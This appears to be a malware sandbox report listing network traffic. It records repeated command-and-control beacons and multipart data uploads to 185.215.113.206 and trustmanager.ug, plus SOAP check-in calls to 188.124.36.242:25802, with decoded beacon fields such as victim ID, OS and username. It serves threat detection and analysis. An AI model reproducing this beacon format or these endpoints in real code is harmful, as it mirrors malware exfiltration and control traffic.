Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32Host: 185.215.113.206Content-Length: 93811Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32Host: trustmanager.ugContent-Length: 93811Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32Host: 185.215.113.206Content-Length: 93811Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 188.124.36.242:25802Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32Host: trustmanager.ugContent-Length: 93811Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32Host: 185.215.113.206Content-Length: 93811Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32Host: trustmanager.ugContent-Length: 93811Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32Host: 185.215.113.206Content-Length: 93811Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32Host: trustmanager.ugContent-Length: 93811Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32Host: 185.215.113.206Content-Length: 93811Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32Host: trustmanager.ugContent-Length: 93811Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32Host: 185.215.113.206Content-Length: 93811Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32Host: trustmanager.ugContent-Length: 93811Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32Host: 185.215.113.206Content-Length: 93811Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 188.124.36.242:25802Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32Host: trustmanager.ugContent-Length: 93811Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.206Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 32 31 30 30 31 26 75 6e 69 74 3d 31 35 32 31 33 38 35 33 33 32 31 39 Data Ascii: d1=1000021001&unit=152138533219
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32Host: 185.215.113.206Content-Length: 93811Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
